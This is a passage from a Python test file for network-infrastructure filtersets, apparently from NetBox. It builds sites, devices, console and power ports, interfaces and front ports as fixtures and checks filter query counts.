ConsolePort(device=devices[0], name='Console Port 1', label='A', description='First'),
ConsolePort(device=devices[1], name='Console Port 2', label='B', description='Second'),
ConsolePort(device=devices[2], name='Console Port 3', label='C', description='Third'),
)
ConsolePort.objects.bulk_create(console_ports)
# Cables
Cable(termination_a=console_ports[0], termination_b=console_server_ports[0]).save()
Cable(termination_a=console_ports[1], termination_b=console_server_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Console Port 1', 'Console Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class ConsoleServerPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsoleServerPort.objects.all()
filterset = ConsoleServerPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
console_ports = (
ConsolePort(device=devices[3], name='Console Server Port 1'),
ConsolePort(device=devices[3], name='Console Server Port 2'),
)
ConsolePort.objects.bulk_create(console_ports)
console_server_ports = (
ConsoleServerPort(device=devices[0], name='Console Server Port 1', label='A', description='First'),
ConsoleServerPort(device=devices[1], name='Console Server Port 2', label='B', description='Second'),
ConsoleServerPort(device=devices[2], name='Console Server Port 3', label='C', description='Third'),
)
ConsoleServerPort.objects.bulk_create(console_server_ports)
# Cables
Cable(termination_a=console_server_ports[0], termination_b=console_ports[0]).save()
Cable(termination_a=console_server_ports[1], termination_b=console_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Console Server Port 1', 'Console Server Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class PowerPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPort.objects.all()
filterset = PowerPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
power_outlets = (
PowerOutlet(device=devices[3], name='Power Outlet 1'),
PowerOutlet(device=devices[3], name='Power Outlet 2'),
)
PowerOutlet.objects.bulk_create(power_outlets)
power_ports = (
PowerPort(device=devices[0], name='Power Port 1', label='A', maximum_draw=100, allocated_draw=50, description='First'),
PowerPort(device=devices[1], name='Power Port 2', label='B', maximum_draw=200, allocated_draw=100, description='Second'),
PowerPort(device=devices[2], name='Power Port 3', label='C', maximum_draw=300, allocated_draw=150, description='Third'),
)
PowerPort.objects.bulk_create(power_ports)
# Cables
Cable(termination_a=power_ports[0], termination_b=power_outlets[0]).save()
Cable(termination_a=power_ports[1], termination_b=power_outlets[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Power Port 1', 'Power Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_maximum_draw(self):
params = {'maximum_draw': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_allocated_draw(self):
params = {'allocated_draw': [50, 100]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class PowerOutletTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerOutlet.objects.all()
filterset = PowerOutletFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
power_ports = (
PowerPort(device=devices[3], name='Power Outlet 1'),
PowerPort(device=devices[3], name='Power Outlet 2'),
)
PowerPort.objects.bulk_create(power_ports)
power_outlets = (
PowerOutlet(device=devices[0], name='Power Outlet 1', label='A', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_A, description='First'),
PowerOutlet(device=devices[1], name='Power Outlet 2', label='B', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_B, description='Second'),
PowerOutlet(device=devices[2], name='Power Outlet 3', label='C', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_C, description='Third'),
)
PowerOutlet.objects.bulk_create(power_outlets)
# Cables
Cable(termination_a=power_outlets[0], termination_b=power_ports[0]).save()
Cable(termination_a=power_outlets[1], termination_b=power_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Power Outlet 1', 'Power Outlet 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_feed_leg(self):
params = {'feed_leg': [PowerOutletFeedLegChoices.FEED_LEG_A, PowerOutletFeedLegChoices.FEED_LEG_B]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class InterfaceTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Interface.objects.all()
filterset = InterfaceFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
# VirtualChassis assignment for filtering
virtual_chassis = VirtualChassis.objects.create(master=devices[0])
Device.objects.filter(pk=devices[0].pk).update(virtual_chassis=virtual_chassis, vc_position=1, vc_priority=1)
Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis, vc_position=2, vc_priority=2)
interfaces = (
Interface(device=devices[0], name='Interface 1', label='A', type=InterfaceTypeChoices.TYPE_1GE_SFP, enabled=True, mgmt_only=True, mtu=100, mode=InterfaceModeChoices.MODE_ACCESS, mac_address='00-00-00-00-00-01', description='First'),
Interface(device=devices[1], name='Interface 2', label='B', type=InterfaceTypeChoices.TYPE_1GE_GBIC, enabled=True, mgmt_only=True, mtu=200, mode=InterfaceModeChoices.MODE_TAGGED, mac_address='00-00-00-00-00-02', description='Second'),
Interface(device=devices[2], name='Interface 3', label='C', type=InterfaceTypeChoices.TYPE_1GE_FIXED, enabled=False, mgmt_only=False, mtu=300, mode=InterfaceModeChoices.MODE_TAGGED_ALL, mac_address='00-00-00-00-00-03', description='Third'),
Interface(device=devices[3], name='Interface 4', label='D', type=InterfaceTypeChoices.TYPE_OTHER, enabled=True, mgmt_only=True, tx_power=40),
Interface(device=devices[3], name='Interface 5', label='E', type=InterfaceTypeChoices.TYPE_OTHER, enabled=True, mgmt_only=True, tx_power=40),
Interface(device=devices[3], name='Interface 6', label='F', type=InterfaceTypeChoices.TYPE_OTHER, enabled=False, mgmt_only=False, tx_power=40),
Interface(device=devices[3], name='Interface 7', type=InterfaceTypeChoices.TYPE_80211AC, rf_role=WirelessRoleChoices.ROLE_AP, rf_channel=WirelessChannelChoices.CHANNEL_24G_1, rf_channel_frequency=2412, rf_channel_width=22),
Interface(device=devices[3], name='Interface 8', type=InterfaceTypeChoices.TYPE_80211AC, rf_role=WirelessRoleChoices.ROLE_STATION, rf_channel=WirelessChannelChoices.CHANNEL_5G_32, rf_channel_frequency=5160, rf_channel_width=20),
)
Interface.objects.bulk_create(interfaces)
# Cables
Cable(termination_a=interfaces[0], termination_b=interfaces[3]).save()
Cable(termination_a=interfaces[1], termination_b=interfaces[4]).save()
# Third pair is not connected
def test_name(self):
params = {'name': ['Interface 1', 'Interface 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_enabled(self):
params = {'enabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'enabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mtu(self):
params = {'mtu': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mgmt_only(self):
params = {'mgmt_only': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'mgmt_only': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_mode(self):
params = {'mode': InterfaceModeChoices.MODE_ACCESS}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_parent(self):
# Create child interfaces
parent_interface = Interface.objects.first()
child_interfaces = (
Interface(device=parent_interface.device, name='Child 1', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
Interface(device=parent_interface.device, name='Child 2', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
Interface(device=parent_interface.device, name='Child 3', parent=parent_interface, type=InterfaceTypeChoices.TYPE_VIRTUAL),
)
Interface.objects.bulk_create(child_interfaces)
params = {'parent_id': [parent_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_bridge(self):
# Create bridged interfaces
bridge_interface = Interface.objects.first()
bridged_interfaces = (
Interface(device=bridge_interface.device, name='Bridged 1', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=bridge_interface.device, name='Bridged 2', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=bridge_interface.device, name='Bridged 3', bridge=bridge_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(bridged_interfaces)
params = {'bridge_id': [bridge_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_lag(self):
# Create LAG members
device = Device.objects.first()
lag_interface = Interface(device=device, name='LAG', type=InterfaceTypeChoices.TYPE_LAG)
lag_interface.save()
lag_members = (
Interface(device=device, name='Member 1', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=device, name='Member 2', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=device, name='Member 3', lag=lag_interface, type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(lag_members)
params = {'lag_id': [lag_interface.pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_virtual_chassis_id(self):
params = {'virtual_chassis_id': [VirtualChassis.objects.first().pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_kind(self):
params = {'kind': 'physical'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'kind': 'virtual'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 0)
def test_mac_address(self):
params = {'mac_address': ['00-00-00-00-00-01', '00-00-00-00-00-02']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [InterfaceTypeChoices.TYPE_1GE_FIXED, InterfaceTypeChoices.TYPE_1GE_GBIC]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_role(self):
params = {'rf_role': [WirelessRoleChoices.ROLE_AP, WirelessRoleChoices.ROLE_STATION]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel(self):
params = {'rf_channel': [WirelessChannelChoices.CHANNEL_24G_1, WirelessChannelChoices.CHANNEL_5G_32]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel_frequency(self):
params = {'rf_channel_frequency': [2412, 5160]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rf_channel_width(self):
params = {'rf_channel_width': [22, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tx_power(self):
params = {'tx_power': [40]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
class FrontPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = FrontPort.objects.all()
filterset = FrontPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[2], name='Rear Port 3', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 4', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 5', type=PortTypeChoices.TYPE_8P8C, positions=6),
RearPort(device=devices[3], name='Rear Port 6', type=PortTypeChoices.TYPE_8P8C, positions=6),
)
RearPort.objects.bulk_create(rear_ports)
front_ports = (
FrontPort(device=devices[0], name='Front Port 1', label='A', type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED, rear_port=rear_ports[0], rear_port_position=1, description='First'),
FrontPort(device=devices[1], name='Front Port 2', label='B', type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN, rear_port=rear_ports[1], rear_port_position=2, description='Second'),
FrontPort(device=devices[2], name='Front Port 3', label='C', type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE, rear_port=rear_ports[2], rear_port_position=3, description='Third'),
FrontPort(device=devices[3], name='Front Port 4', label='D', type=PortTypeChoices.TYPE_FC, rear_port=rear_ports[3], rear_port_position=1),
FrontPort(device=devices[3], name='Front Port 5', label='E', type=PortTypeChoices.TYPE_FC, rear_port=rear_ports[4], rear_port_position=1),
FrontPort(device=devices[3], name='Front Port 6', label='F', type=PortTypeChoices.TYPE_FC, rear_port=rear_ports[5], rear_port_position=1),
)
FrontPort.objects.bulk_create(front_ports)
# Cables
Cable(termination_a=front_ports[0], termination_b=front_ports[3]).save()
Cable(termination_a=front_ports[1], termination_b=front_ports[4]).save()
# Third port is not connected
